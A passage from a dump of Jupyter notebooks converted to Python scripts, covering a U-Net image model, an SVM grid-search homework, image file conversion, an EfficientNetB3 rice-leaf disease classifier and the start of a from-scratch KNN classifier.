kernel_size, activation = 'relu', padding = 'same')(pool4)\n conv5 = Conv2D(512, kernel_size = kernel_size, activation = 'relu', padding = 'same')(conv5)\n\n up1 = Conv2DTranspose(filters = 256, kernel_size=(2,2), strides=(2,2), padding = 'same', activation = 'relu')(conv5)\n up1 = concatenate([ conv4_concat, up1 ] , axis = 3)\n conv6 = Conv2D(256, kernel_size = kernel_size, activation = 'relu', padding = 'same')(up1)\n conv6 = Conv2D(256, kernel_size = kernel_size, activation = 'relu', padding = 'same')(conv6)\n up7 = Conv2DTranspose(filters = 128, kernel_size=(2,2), strides=(2,2), padding = 'same', activation = 'relu')(conv6)\n up7 = concatenate([conv3, up7], axis = 3)\n conv7 = Conv2D(128, kernel_size = kernel_size, activation = 'relu', padding = 'same')(up7)\n conv7_1 = Conv2D(128, kernel_size = kernel_size, activation = 'relu', padding = 'same')(conv7)\n concat_1_up = concatenate([conv7, conv7_1], axis = 3)#128 concat\n\n up8 = Conv2DTranspose(filters = 64, kernel_size=(2,2), strides=(2,2), padding = 'same', activation = 'relu')(concat_1_up)\n up8 = concatenate([conv2_concat, up8], axis = 3)\n conv8 = Conv2D(64, kernel_size = kernel_size, activation = 'relu', padding = 'same')(up8)\n conv8_1 = Conv2D(64, kernel_size = kernel_size, activation = 'relu', padding = 'same')(conv8)\n concat_2_up = concatenate([conv8, conv8_1], axis = 3)#64 concat\n\n up9 = Conv2DTranspose(filters = 32, kernel_size=(2,2), strides=(2,2), padding = 'same', activation = 'relu')(concat_2_up)\n up9 = concatenate([conv1_concat, up9], axis = 3)\n conv9 = Conv2D(filters = 32, kernel_size = kernel_size, activation = 'relu', padding = 'same')(up9)\n output = Conv2D(filters = 3, kernel_size = kernel_size, activation='sigmoid', padding='same')(conv9)\n model = Model(input , output)\n return model\n\n def SSIM(self, x_true, x_pred):\n return tf.image.ssim(x_true, x_pred, max_val=1.0, filter_size=11,\n filter_sigma=1.5, k1=0.01, k2=0.03)\n def PSNR(self, original_image, reconstructed_image):\n return tf.image.psnr(original_image, reconstructed_image, max_val=1)\n\n def ssim_loss(self, y_true, y_pred):\n return 1.-tf.image.ssim(y_true, y_pred, max_val=1.0, filter_size=11,\n filter_sigma=1.5, k1=0.01, k2=0.03)+1./self.PSNR(y_true, y_pred)\n\n def make_compiled_model(self):\n model = self.__prepare_model()\n model.compile(loss=self.ssim_loss, optimizer=Adam(learning_rate=0.001), metrics=[self.SSIM, self.PSNR])\n return model\n\nmodel = My_Model_Arch().make_compiled_model()\n\n# + colab={\"base_uri\": \"https://localhost:8080/\"} id=\"Mxl0UQz9GwIu\" outputId=\"c3e9d336-d5c1-4d05-ee8b-74be11c823f9\"\nif imageClear.shape == imageNoise.shape:\n print(imageClear.shape, imageNoise.shape)\n train_history = model.fit(\n imageNoise,\n imageClear,\n epochs=65,\n shuffle=True,\n batch_size = 32,\n validation_data=(imageNoise_valid, imageClear_valid)\n)\n\n# + id=\"GfRLQctyGz4s\"\ntf.keras.models.save_model( model, 'drive/MyDrive/model/tests/test_unet_skip_connects.h5' )\n\n# + id=\"H1TjJAGNG0pK\"\nimageClear = []\nimage_clear_path = '/content/drive/MyDrive/baza/test_base/true_image_test/'\nfor image in os.listdir(image_clear_path):\n imageClear.append(cv2.imread(os.path.join(image_clear_path, image)))\n\nimageClear = np.array(imageClear, dtype='object')\n\nimageClear = imageClear.astype('float32') / 255.\nprediction = model.predict(imageClear)\n\n# + colab={\"base_uri\": \"https://localhost:8080/\", \"height\": 529} id=\"JK-ez9ku00i6\" outputId=\"caba4666-236f-49a1-b1ed-80cb57347175\"\nidx = 9\ncv2_imshow(prediction[idx]* 255.)\ncv2_imshow(imageClear[idx]* 255.)\n","repo_name":"mkalinowski11/Reflects-removal-project","sub_path":"models_implementation_notebooks/UNet++_type.ipynb","file_name":"UNet++_type.ipynb","file_ext":"py","file_size_in_byte":7948,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-jupyter-script","pt":"3"} +{"seq_id":"37892707256","text":"# + id=\"Z0yGksgOp91i\"\nimport numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\nfrom sklearn.svm import SVC, SVR\nfrom sklearn.metrics import accuracy_score\n\n# + id=\"7ZYQFbA0qMZ-\"\n# Load data\nx_train = np.load(\"x_train.npy\")\ny_train = np.load(\"y_train.npy\")\nx_test = np.load(\"x_test.npy\")\ny_test = np.load(\"y_test.npy\")\n\n# + id=\"u0ewnfh6qOoM\"\n# 7000 data with 300 features\nprint(x_train.shape)\nprint(y_train.shape)\nprint(x_test.shape)\n\n# + id=\"ryZdU0fdqTkb\"\n# It's a binary classification problem \nprint(np.unique(y_train))\n\n\n# + [markdown] id=\"qy1aMJ7sqwwg\"\n# # Q1\n\n# + id=\"TI26_jRbqVX3\"\ndef cross_validation(x_train, y_train, k=5):\n \n # Do not modify the function name and always take 'x_train, y_train, k' as the inputs.\n\n # TODO HERE\n k_fold_data = []\n \n #shuffle\n np.random.seed(0)\n train_size = np.shape(x_train)[0]\n shuffle_index = np.arange(train_size)\n np.random.shuffle(shuffle_index)\n for i in range(k):\n ##Calculate boundary\n left_bound = np.int64(i*train_size/k)\n right_bound = np.int64((i+1)*train_size/k)\n #Split the training data\n x_train_fold = np.concatenate((x_train[shuffle_index[0:left_bound]],x_train[shuffle_index[right_bound:train_size]]), axis=0)\n y_train_fold = np.reshape(np.concatenate((y_train[shuffle_index[0:left_bound]],y_train[shuffle_index[right_bound:train_size]]), axis=0),(-1,1))\n train_fold = np.concatenate((x_train_fold, y_train_fold), axis=1)\n x_val_fold = x_train[shuffle_index[left_bound: right_bound]]\n y_val_fold = np.reshape(y_train[shuffle_index[left_bound: right_bound]],(-1,1))\n val_fold = np.concatenate((x_val_fold, y_val_fold), axis=1)\n #Pack the data\n kth_data=[]\n kth_data.append(train_fold)\n kth_data.append(val_fold)\n k_fold_data.append(kth_data)\n return k_fold_data\n\n\n# + id=\"7jTma6saqf3E\"\nkfold_data = cross_validation(x_train, y_train, k=10)\nassert len(kfold_data) == 10 # should contain 10 fold of data\nassert len(kfold_data[0]) == 2 # each element should contain train fold and validation fold\nassert kfold_data[0][1].shape[0] == 700 # The number of data in each validation fold should equal to training data divieded by K\n\n# + [markdown] id=\"IccJcpN_q0Z0\"\n# # K-Fold Example\n\n# + id=\"O_zT2TAzqjay\"\nfrom sklearn.model_selection import KFold\n\nX = np.arange(20)\n\nkf = KFold(n_splits=5, shuffle=True)\nkfold_data= []\nfor i, (train_index, val_index) in enumerate(kf.split(X)):\n print(\"Split: %s, Training index: %s, Validation index: %s\" % (i+1, train_index, val_index))\n kfold_data.append([train_index, val_index])\n\n# + id=\"lYCTmie5qnow\"\nassert len(kfold_data) == 5 # should contain 5 fold of data\nassert len(kfold_data[0]) == 2 # each element should contains index of training fold and validation fold\nassert kfold_data[0][1].shape[0] == 4 # The number of data in each validation fold should equal to training data divieded by K\n\n# + [markdown] id=\"Gh-DQiNiq5v0\"\n# ## Q2\n\n# + id=\"31V1fW7Qq6la\"\n# (Example) Using SVC from sklearn\n\nclf = SVC(C=1.0, gamma=0.01, kernel='rbf')\n\n# + id=\"VzBT0t6Yq_Dj\"\nbest_c, best_gamma = None, None\n\n# TODO HERE\n# k-Flod Cross Validation and Grid Search\n#def accuracy_score(y, y_pred):\n# return (y_pred == y).sum()/np.shape(y)[0]\n\ndef grid_search( x_train, y_train, c, gamma, k):\n best_c, best_gamma, best_acc = None, None, 0\n kfold_data = cross_validation(x_train, y_train, k)\n total_acc = np.zeros((len(c),len(gamma)))\n for i_th ,c_ in enumerate(c):\n #print(\"i_th: \", i_th)\n for j_th, gamma_ in enumerate(gamma):\n #print(\"j_th: \", j_th)\n k_fold_acc = np.zeros(k)\n for k_th , k_th_data in enumerate(kfold_data):\n k_train = k_th_data[0]\n k_val = k_th_data[1]\n clf = SVC(C=c_, gamma=gamma_, kernel='rbf')\n clf.fit(k_train[:,0:-1], np.reshape(k_train[:,-1],-1))\n y_pred = clf.predict(k_val[:,0:-1])\n k_fold_acc[k_th] = accuracy_score(np.reshape(k_val[:,-1],-1), y_pred)\n total_acc[i_th][j_th] = np.average(k_fold_acc)\n #print(\"total_acc[i_th][j_th]: \", total_acc[i_th][j_th])\n if total_acc[i_th][j_th] >= best_acc:\n best_c = c_\n best_gamma = gamma_\n best_acc = total_acc[i_th][j_th]\n return best_c, best_gamma , total_acc\n\nc = [0.01, 0.1, 1, 10, 100, 1000, 10000]\ngamma = [1e-4, 1e-3, 0.01, 0.1, 1, 10, 100, 1000]\n#c = [100, 1000]\n#gamma = [10, 100]\nk = 5\nbest_c, best_gamma , total_acc = grid_search(x_train, y_train, c, gamma, 5)\nbest_parameters=(best_c, best_gamma)\n#print(total_acc)\n\n# + id=\"mGTyHMFgrAXd\"\nprint(\"(best_c, best_gamma) is \", best_parameters)\n\n\n# + [markdown] id=\"KbPoOy0lrDPJ\"\n# # Q3\n\n# + id=\"ibuxQOEQrEgJ\"\n# Plot the grid search results of your SVM\n\n# TODO HERE\ndef show_grid_search(c, gamma, total_acc):\n threshold = (np.max(total_acc)+np.min(total_acc))/2\n color_range = (np.max(total_acc)-np.min(total_acc))/2\n plt.imshow(total_acc,interpolation='nearest',cmap=plt.cm.RdBu)\n plt.title(\"Hyperparameter Gridsearch\")\n plt.colorbar()\n \n tick_index_gamma = np.arange(len(gamma))\n tick_index_c = np.arange(len(c))\n \n plt.xticks(tick_index_gamma,gamma)\n plt.yticks(tick_index_c,c, rotation=90)\n for i in range(total_acc.shape[0]):\n for j in range(total_acc.shape[1]):\n plt.text(j,i,format(total_acc[i,j], '.2f'),horizontalalignment=\"center\",color=\"black\" if ((total_acc[i,j] > (threshold-color_range))&(total_acc[i,j] < (threshold+color_range))) else \"white\")\n plt.tight_layout()\n plt.xlabel(\"Gamma Parameter\")\n plt.ylabel(\"C Parameter\")\n plt.show()\n\nshow_grid_search(c, gamma, total_acc)\n\n# + [markdown] id=\"QVA-It-4rM9Q\"\n# ## Q4\n\n# + id=\"Zl963HdLrMKg\"\n# Do Not Modify Below\n\nbest_model = SVC(C=best_parameters[0], gamma=best_parameters[1], kernel='rbf')\nbest_model.fit(x_train, y_train)\n\ny_pred = best_model.predict(x_test)\n\nprint(\"Accuracy score: \", accuracy_score(y_pred, y_test))\n\n# If your accuracy here > 0.9 then you will get full credit (20 points).\n","repo_name":"ThreeMonth03/Pattern-Recognition-and-Machine-Learning","sub_path":"HW4/0810749_HW4.ipynb","file_name":"0810749_HW4.ipynb","file_ext":"py","file_size_in_byte":6112,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-jupyter-script","pt":"3"} +{"seq_id":"26355945381","text":"# +\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport csv\n\nX = [] # 배열 형태로 선언, X는 attribute\nY = [] # 배열 형태로 선언, Y는 label\n\n# +\n# dataset open\nf= open(\"X.csv\", 'r');\ncsvReader = csv.reader(f)\nfor row in csvReader:\n X.append(row) #csvReader 로 데이터를 2차원 배열형태로 받고 row에 한행씩 저장된다.\n\nf = open(\"Y.csv\",\"r\")\ncsvReader = csv.reader(f)\nfor row in csvReader:\n Y.append(row) # 마찬가지로 row 형태로 Y 배열에 한 row씩 저장\n \nf.close()\n# -\n\n\n","repo_name":"gunooknam/Deep_learning_Study","sub_path":".ipynb_checkpoints/Untitled-checkpoint.ipynb","file_name":"Untitled-checkpoint.ipynb","file_ext":"py","file_size_in_byte":532,"program_lang":"python","lang":"ko","doc_type":"code","stars":1,"dataset":"github-jupyter-script","pt":"3"} +{"seq_id":"18557920591","text":"import pandas as pd\nimport gender_guesser.detector as gender\nd = gender.Detector(case_sensitive=False)\n\npath = \"movie_metadata.csv\"\n\nfile = pd.read_csv(path)\nfor row in file:\n print(row[6])\n\nprint(d.get_gender(u\"Jason\"))\n\n\n","repo_name":"haidysedky/AnalyticsProject-UCI","sub_path":".ipynb_checkpoints/gender-checkpoint.ipynb","file_name":"gender-checkpoint.ipynb","file_ext":"py","file_size_in_byte":226,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-jupyter-script","pt":"3"} +{"seq_id":"330601731","text":"import os \nimport cv2\n\n# # 更改檔名(tif直接改附檔名會編碼錯誤)\n\n# +\npath = './img_input/'\nsave_path = './img_output'\nori_type = '.tif'\ntarget_tpye = '.jpg'\n\nfiles = os.listdir(path)\nprint(files)\nn = 0\nfor i in files:\n oldname = path + files [n]\n newname = path +str(n+1)+ori_type\n os.rename(oldname, newname)\n # print(oldname)\n# print(newname)\n n = n+1\n# -\n\n# # 變更圖檔類型(tif -> jpg)\n\n# +\npath = './img_input/'\nsave_path = './img_output'\nori_type = '.tif'\ntarget_tpye = '.jpg'\n\ntif_list = os.listdir(path)\nprint(type(tif_list))\n\nn =0\nfor i in tif_list:\n oldname = path + tif_list [n]\n img = cv2.imread(oldname,-1)\n x = cv2.imwrite(os.path.join(save_path,i.split('.')[0]+target_tpye),img)\n # print(oldname)\n # print(img)\n n=n+1\n\n# -\n\n\n\n\n","repo_name":"ChengChen-Yang/project_evaluation-cell-viability","sub_path":"1_change&convert/change&convert.ipynb","file_name":"change&convert.ipynb","file_ext":"py","file_size_in_byte":810,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-jupyter-script","pt":"3"} +{"seq_id":"25652959606","text":"# + id=\"aymaXBbEISUD\"\nimport numpy as np\nimport pandas as pd\nimport os\nos.environ['TF_CPP_MIN_LOG_LEVEL'] = '2'\nimport time\nimport matplotlib.pyplot as plt\nimport cv2\nimport seaborn as sns\nsns.set_style('darkgrid')\nimport shutil\nfrom sklearn.metrics import confusion_matrix, classification_report\nfrom sklearn.model_selection import train_test_split\nimport tensorflow as tf\nfrom tensorflow import keras\nfrom tensorflow.keras.preprocessing.image import ImageDataGenerator\nfrom tensorflow.keras.layers import Dense, Activation,Dropout,Conv2D, MaxPooling2D,BatchNormalization\nfrom tensorflow.keras.optimizers import Adam, Adamax\nfrom tensorflow.keras.metrics import categorical_crossentropy\nfrom tensorflow.keras import regularizers\nfrom tensorflow.keras.models import Model\n\n# + colab={\"base_uri\": \"https://localhost:8080/\"} id=\"a0NCafiLIdhO\" outputId=\"f0cd6dee-c9df-4c3e-d1fb-fbc46444ae2a\"\nfrom google.colab import drive \ndrive.mount('/content/drive/')\n\n# + id=\"A2To7CxfRg3V\"\nimport cv2\nimport imghdr\nimport pathlib\nsdir='/content/drive/MyDrive/Processed'\nsdir = pathlib.Path(sdir)\n\n\n# + id=\"8XHWRH5gOP2-\"\ntrain_dir='/content/drive/MyDrive/Processed/train'\n\n# + colab={\"base_uri\": \"https://localhost:8080/\", \"height\": 1000} id=\"qZV0fjbQIWWO\" outputId=\"f2c67c61-932d-4bb2-ad2d-e3fad93498b4\"\ncroplist=os.listdir(sdir)\nfilepaths = []\nlabels=[]\nfor crop in croplist:\n croppath=os.path.join(sdir,crop) \n classlist=os.listdir(croppath)\n for klass in classlist: \n classpath=os.path.join(croppath,klass)\n flist=os.listdir(classpath)\n for f in flist:\n fpath=os.path.join(classpath,f)\n filepaths.append(fpath)\n labels.append(klass)\nFseries=pd.Series(filepaths, name='filepaths')\nLseries=pd.Series(labels, name='labels') \ndf=pd.concat([Fseries, Lseries], axis=1)\ntrain_df, dummy_df=train_test_split(df, train_size=.8, shuffle=True, random_state=123, stratify=df['labels']) \nvalid_df, test_df=train_test_split(dummy_df, train_size=.5, shuffle=True, random_state=123, stratify=dummy_df['labels'])\nprint('train_df lenght: ', len(train_df))\n# get the number of classes and the images count for each class in train_df\nclasses=sorted(list(train_df['labels'].unique()))\nclass_count = len(classes)\nprint('The number of classes in the dataset is: ', class_count)\ngroups=train_df.groupby('labels')\ncountlist=[]\nclasslist=[]\nfor label in sorted(list(train_df['labels'].unique())):\n group=groups.get_group(label)\n countlist.append(len(group))\n classlist.append(label)\nCatseries=pd.Series(classlist, name='Category')\nCountseries=pd.Series(countlist, name='Image Count')\ncrop_df=pd.concat([Catseries, Countseries], axis=1)\nprint(crop_df.head(class_count))\nfig = plt.figure(figsize=(10,10))\nlabels=crop_df['Category']\nsizes=crop_df['Image Count']\nx=np.arange(len(labels))\nplt.xticks(np.arange(class_count)+.5, classes, rotation=90)\nplt.title('Image Sample distribution')\nplt.bar(x,sizes, tick_label=crop_df['Category'])\nplt.show()\n# get the classes with the minimum and maximum number of train images\nmax_value=np.max(countlist)\nmax_index=countlist.index(max_value)\nmax_class=classlist[max_index]\nmin_value=np.min(countlist)\nmin_index=countlist.index(min_value)\nmin_class=classlist[min_index]\nprint(max_class, ' has the most images= ',max_value, ' ', min_class, ' has the least images= ', min_value)\n# lets get the average height and width of a sample of the train images\nht=0\nwt=0\n# select 100 random samples of train_df\ntrain_df_sample=train_df.sample(n=100, random_state=123,axis=0)\nfor i in range (len(train_df_sample)):\n fpath=train_df_sample['filepaths'].iloc[i]\n img=plt.imread(fpath)\n shape=img.shape\n ht += shape[0]\n wt += shape[1]\nprint('average height= ', ht//100, ' average width= ', wt//100, 'aspect ratio= ', ht/wt)\n\n\n# + colab={\"base_uri\": \"https://localhost:8080/\"} id=\"Rb0JV2b6IWYu\" outputId=\"fe239af8-1208-4a23-ee0d-21d7db223876\"\ndef trim(df, max_samples, min_samples, column):\n df=df.copy()\n groups=df.groupby(column) \n trimmed_df = pd.DataFrame(columns = df.columns)\n groups=df.groupby(column)\n for label in df[column].unique(): \n group=groups.get_group(label)\n count=len(group) \n if count > max_samples:\n sampled_group=group.sample(n=max_samples, random_state=123,axis=0)\n trimmed_df=pd.concat([trimmed_df, sampled_group], axis=0)\n else:\n if count>=min_samples:\n sampled_group=group \n trimmed_df=pd.concat([trimmed_df, sampled_group], axis=0)\n print('after trimming, the maximum samples in any class is now ',max_samples, ' and the minimum samples in any class is ', min_samples)\n return trimmed_df\n\nmax_samples=490 # since each class has more than 200 images all classes will be trimmed to have 200 images per class\nmin_samples=400\ncolumn='labels'\ntrain_df= trim(train_df, max_samples, min_samples, column)\n\n# + colab={\"base_uri\": \"https://localhost:8080/\"} id=\"RdxzRorXR8ae\" outputId=\"5d041c8d-258a-402a-e60a-e2da9581de99\"\n\nbatch_size=30 \ntrgen=ImageDataGenerator(horizontal_flip=True,rotation_range=20, width_shift_range=.2,\n height_shift_range=.2, zoom_range=.2 )\nt_and_v_gen=ImageDataGenerator()\nmsg='{0:70s} for train generator'.format(' ')\nprint(msg, '\\r', end='')\ntrain_gen=trgen.flow_from_dataframe(train_df, x_col='filepaths', y_col='labels', target_size=img_size,\n class_mode='categorical', color_mode='rgb', shuffle=True, batch_size=batch_size)\nmsg='{0:70s} for valid generator'.format(' ')\nprint(msg, '\\r', end='')\nvalid_gen=t_and_v_gen.flow_from_dataframe(valid_df, x_col='filepaths', y_col='labels', target_size=img_size,\n class_mode='categorical', color_mode='rgb', shuffle=False, batch_size=batch_size)\n\n\nlength=len(test_df)\ntest_batch_size=sorted([int(length/n) for n in range(1,length+1) if length % n ==0 and length/n<=80],reverse=True)[0] \ntest_steps=int(length/test_batch_size)\nmsg='{0:70s} for test generator'.format(' ')\nprint(msg, '\\r', end='')\n\n\ntest_gen=t_and_v_gen.flow_from_dataframe(test_df, x_col='filepaths', y_col='labels', target_size=img_size,\n class_mode='categorical', color_mode='rgb', shuffle=False, batch_size=test_batch_size)\n\n\nclasses=list(train_gen.class_indices.keys())\nclass_indices=list(train_gen.class_indices.values())\nclass_count=len(classes)\nlabels=test_gen.labels\nprint ( 'test batch size: ' ,test_batch_size, ' test steps: ', test_steps, ' number of classes : ', class_count)\n\n\n# + colab={\"base_uri\": \"https://localhost:8080/\", \"height\": 883} id=\"0xbp9GdSR8kK\" outputId=\"b04b803d-6335-45a1-ee78-ac9a360d19c0\"\ndef show_image_samples(gen ):\n t_dict=gen.class_indices\n classes=list(t_dict.keys()) \n images,labels=next(gen) \n plt.figure(figsize=(20, 20))\n length=len(labels)\n if length<25:\n r=length\n else:\n r=25\n for i in range(r): \n plt.subplot(5, 5, i + 1)\n image=images[i] /255 \n plt.imshow(image)\n index=np.argmax(labels[i])\n class_name=classes[index]\n plt.title(class_name, color='blue', fontsize=12)\n plt.axis('off')\n plt.show()\n \nshow_image_samples(train_gen )\n\n# + id=\"irikfK7ziQuM\"\nimg_shape=(img_size[0], img_size[1], 3)\nmodel_name='EfficientNetB3'\nbase_model=tf.keras.applications.efficientnet.EfficientNetB3(include_top=False, weights=\"imagenet\",input_shape=img_shape, pooling='max') \nbase_model.trainable=True\nx=base_model.output\nx=BatchNormalization(axis=-1, momentum=0.99, epsilon=0.001 )(x)\nx = Dense(256, kernel_regularizer = regularizers.l2(l = 0.016),activity_regularizer=regularizers.l1(0.006),\n bias_regularizer=regularizers.l1(0.006) ,activation='relu')(x)\nx=Dropout(rate=.4, seed=123)(x) \noutput=Dense(class_count, activation='softmax')(x)\nmodel=Model(inputs=base_model.input, outputs=output)\nlr=.001 # start with this learning rate\nmodel.compile(Adamax(learning_rate=lr), loss='categorical_crossentropy', metrics=['accuracy']) \n\n# + id=\"EP3bOc28R8p8\"\n\n\n# + id=\"MoXJxYoCSUYz\"\nclass LR_ASK(keras.callbacks.Callback):\n def __init__ (self, model, epochs, ask_epoch): \n super(LR_ASK, self).__init__()\n self.model=model \n self.ask_epoch=ask_epoch\n self.epochs=epochs\n self.ask=True \n self.lowest_vloss=np.inf\n self.best_weights=self.model.get_weights() # set best weights to model's initial weights\n self.best_epoch=1\n \n \n def on_train_begin(self, logs=None): # this runs on the beginning of training\n if self.ask_epoch == 0: \n print('you set ask_epoch = 0, ask_epoch will be set to 1', flush=True)\n self.ask_epoch=1\n if self.ask_epoch >= self.epochs: \n print('ask_epoch >= epochs, will train for ', epochs, ' epochs', flush=True)\n self.ask=False \n if self.epochs == 1:\n self.ask=False# running only for 1 epoch so do not query user\n else:\n print('Training will proceed until epoch', ask_epoch,' then you will be asked to') \n print(' enter H to halt training or enter an integer for how many more epochs to run then be asked again') \n self.start_time= time.time() \n \n def on_train_end(self, logs=None): # runs at the end of training \n print('loading model with weights from epoch ', self.best_epoch)\n self.model.set_weights(self.best_weights) # set the weights of the model to the best weights\n tr_duration=time.time() - self.start_time \n hours = tr_duration // 3600\n minutes = (tr_duration - (hours * 3600)) // 60\n seconds = tr_duration - ((hours * 3600) + (minutes * 60))\n msg = f'training elapsed time was {str(hours)} hours, {minutes:4.1f} minutes, {seconds:4.2f} seconds)'\n print (msg, flush=True) \n \n def on_epoch_end(self, epoch, logs=None): # method runs on the end of each epoch\n v_loss=logs.get('val_loss') # get the validation loss for this epoch\n if v_loss< self.lowest_vloss:\n self.lowest_vloss=v_loss\n self.best_weights=self.model.get_weights() # set best weights to model's initial weights\n self.best_epoch=epoch + 1\n print ('\\n validation loss reduced, saving weights from epoch ', epoch + 1, ' as best weights')\n \n if self.ask: \n if epoch + 1 ==self.ask_epoch: \n print('\\n Enter H to end training or an integer for the number of additional epochs to run then ask again')\n ans=input()\n \n if ans == 'H' or ans =='h' or ans == '0': # quit training for these conditions\n print ('you entered ', ans, ' Training halted on epoch ', epoch+1, ' due to user input\\n', flush=True)\n self.model.stop_training = True # halt training\n else: # user wants to continue training\n self.ask_epoch += int(ans)\n if self.ask_epoch > self.epochs:\n print('\\nYou specified maximum epochs of as ', self.epochs, ' cannot train for ', self.ask_epoch, flush =True)\n else:\n print ('you entered ', ans, ' Training will continue to epoch ', self.ask_epoch, flush=True)\n lr=float(tf.keras.backend.get_value(self.model.optimizer.lr)) # get the current learning rate\n print('current LR is ', lr,' hit enter to keep this LR or enter a new LR')\n ans=input(' ')\n if ans =='':\n print ('keeping current LR')\n else:\n new_lr=float(ans)\n tf.keras.backend.set_value(self.model.optimizer.lr, new_lr) # set the learning rate in the optimizer\n print(' changing LR to ', ans)\n\n# + id=\"OMIeXSLxSUeJ\"\nepochs=40\nask_epoch=10\nask=LR_ASK(model, epochs, ask_epoch)\nrlronp=tf.keras.callbacks.ReduceLROnPlateau(monitor=\"val_loss\", factor=0.5, patience=2,verbose=1)\ncallbacks=[rlronp, ask]\ncallbacks=[ask]\n\n# + colab={\"base_uri\": \"https://localhost:8080/\"} id=\"TsFnqasmS4cF\" outputId=\"36cc65bf-5874-4579-8805-7f1053028ce4\"\n\nhistory=model.fit(x=train_gen, epochs=epochs, verbose=1, callbacks=callbacks, validation_data=valid_gen,\n validation_steps=None, shuffle=False, initial_epoch=0)\n\n\n# + colab={\"base_uri\": \"https://localhost:8080/\", \"height\": 885} id=\"urQSxWnITHA1\" outputId=\"7cb91571-1368-480e-90cb-85ee1ae2801d\"\ndef predictor(test_gen, test_steps):\n y_pred= []\n y_true=test_gen.labels\n classes=list(train_gen.class_indices.keys())\n class_count=len(classes)\n errors=0\n preds=model.predict(test_gen, steps=test_steps, verbose=1)\n tests=len(preds)\n for i, p in enumerate(preds):\n pred_index=np.argmax(p) \n true_index=test_gen.labels[i] # labels are integer values\n if pred_index != true_index: # a misclassification has occurred \n errors=errors + 1\n y_pred.append(pred_index)\n acc=( 1-errors/tests) * 100\n print(f'there were {errors} errors in {tests} tests for an accuracy of {acc:6.2f}')\n ypred=np.array(y_pred)\n ytrue=np.array(y_true)\n if class_count <=30:\n cm = confusion_matrix(ytrue, ypred )\n \n plt.figure(figsize=(12, 8))\n sns.heatmap(cm, annot=True, vmin=0, fmt='g', cmap='Blues', cbar=False) \n plt.xticks(np.arange(class_count)+.5, classes, rotation=90)\n plt.yticks(np.arange(class_count)+.5, classes, rotation=0)\n plt.xlabel(\"Predicted\")\n plt.ylabel(\"Actual\")\n plt.title(\"Confusion Matrix\")\n plt.show()\n clr = classification_report(y_true, y_pred, target_names=classes, digits= 4) # create classification report\n print(\"Classification Report:\\n----------------------\\n\", clr)\n return errors, tests\nerrors, tests=predictor(test_gen, test_steps)\n\n# + id=\"kDccIlCmo9Xq\"\nmodel.save_weights('segment_model_weights.h5')\n\n\n# + id=\"oxIvk1KVqm-C\"\nimport tensorflow as tf\nfrom tensorflow.keras.models import Model\nfrom tensorflow.keras.layers import Dense, Dropout, BatchNormalization\nfrom tensorflow.keras.optimizers import Adamax\n\n\nimg_size = (224, 224)\nclass_count = 4\nimg_shape = (img_size[0], img_size[1], 3)\n\n\nbase_model = tf.keras.applications.efficientnet.EfficientNetB3(include_top=False, weights=\"imagenet\",input_shape=img_shape, pooling='max') \n\n# Make the base model trainable\nbase_model.trainable = True\n\nx = base_model.output\nx = BatchNormalization(axis=-1, momentum=0.99, epsilon=0.001)(x)\nx = Dense(256, kernel_regularizer=regularizers.l2(l=0.016), activity_regularizer=regularizers.l1(0.006),\n bias_regularizer=regularizers.l1(0.006), activation='relu')(x)\nx = Dropout(rate=.4, seed=123)(x) \noutput = Dense(class_count, activation='softmax')(x)\n\n\nmodel = Model(inputs=base_model.input, outputs=output)\n\n\nmodel.load_weights('segment_model_weights.h5')\n\n\nlr = 0.001\nmodel.compile(Adamax(learning_rate=lr), loss='categorical_crossentropy', metrics=['accuracy'])\n\n\n# + colab={\"base_uri\": \"https://localhost:8080/\"} id=\"uKsKpR5iqnHJ\" outputId=\"41bbf1a2-5c07-4465-ba5d-0ad27088f609\"\n# Save the trained model in a binary format\ntf.saved_model.save(model, 'segment_trained_model')\n\n\n# + colab={\"base_uri\": \"https://localhost:8080/\"} id=\"5Y2899DNuwsB\" outputId=\"1a083e20-d06b-4213-86dd-0f1ce842b8d4\"\nimport tensorflow as tf\n\n# Convert the model to TFLite format\nconverter = tf.lite.TFLiteConverter.from_keras_model(model)\ntflite_model = converter.convert()\n\n# Save the TFLite model to disk\nwith open('segment_trained_model.tflite', 'wb') as f:\n f.write(tflite_model)\n\n\n# + id=\"0xcYWx6xDpbP\"\n\n","repo_name":"mham7/Rice-leaf-disease-detector","sub_path":"rice_disease_detector_model.ipynb","file_name":"rice_disease_detector_model.ipynb","file_ext":"py","file_size_in_byte":15901,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-jupyter-script","pt":"3"} +{"seq_id":"73644219921","text":"# + [markdown] id=\"view-in-github\" colab_type=\"text\"\n# \"Open\n\n# + [markdown] id=\"QNuYuEEwgoLo\"\n# ## Importing necessary libraries\n\n# + id=\"anm7ygLlfspu\"\n# Importing sqrt function from math module\nfrom math import sqrt\n\n\n# + [markdown] id=\"jJpOaYQJf0J6\"\n# ## Calculating Euclidean distance\n\n# + id=\"U7AMYD0HfzDl\"\n# calculate the Euclidean distance between two vectors\n# Formula - Euclidean Distance = sqrt(sum i to N (x1_i – x2_i)^2)\ndef euclidean_distance(row1, row2):\n distance = 0.0\n for i in range(len(row1)):\n distance += (row1[i] - row2[i])**2\n return sqrt(distance)\n\n\n# + [markdown] id=\"a7na92_Yf77j\"\n# ## Locating the most similar neighbors\n\n# + id=\"UH_OgsHyfzI3\"\n# Locate the most similar neighbors\n# Result\n# [6, 5, 7, 5, 6, 7, 1]\n# [7, 6, 7, 6, 5, 6, 1]\n# [5, 6, 6, 6, 5, 7, 1]\n\ndef get_neighbors(train, test_row, num_neighbors):\n distances = list()\n for train_row in train:\n dist = euclidean_distance(test_row, train_row)\n distances.append((train_row, dist))\n distances.sort(key=lambda tup: tup[1])\n neighbors = list()\n for i in range(num_neighbors):\n neighbors.append(distances[i][0])\n return neighbors\n\n\n# + [markdown] id=\"Vii7P5yegEzg\"\n# ## Making Classification prediction with neighbors\n\n# + id=\"3Fpn3kSnfzLZ\"\n# Make a classification prediction with neighbors\n# test_row is [7, 6, 5, 5, 6, 7]\n# num_neighbors is 3\ndef predict_classification(train, test_row, num_neighbors):\n neighbors = get_neighbors(train, test_row, num_neighbors)\n output_values = [row[-1] for row in neighbors]\n prediction = max(set(output_values), key=output_values.count)\n return prediction\n\n\n# + [markdown] 